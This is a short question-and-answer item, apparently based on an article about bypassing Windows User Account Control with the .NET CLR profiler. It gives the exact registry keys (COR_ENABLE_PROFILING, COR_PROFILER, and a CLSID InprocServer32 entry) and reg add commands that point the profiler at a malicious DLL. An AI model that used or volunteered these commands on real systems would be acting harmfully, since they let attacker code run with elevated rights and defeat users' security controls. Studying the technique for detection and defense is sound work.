What registry keys are modified for the CLR UAC bypass via environment variables, and how can they be set using the command line?
Two sets of registry keys are modified: under `HKCU\Environment` you set `COR_ENABLE_PROFILING=1` and `COR_PROFILER={CLSID}`; under `HKCU\Software\Classes\CLSID\{CLSID}\InprocServer32` you set the default value to the path of the malicious DLL. The article sets them with `reg add` commands, e.g., `REG ADD "HKCU\Software\Classes\CLSID\{...}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f` and `REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{...}" /f`. Alternative methods such as `wmic` or PowerShell are also described in the related articles on persistence.
registry modification, reg add, HKCU, CLSID, environment variables
Source: Use CLR to bypass UAC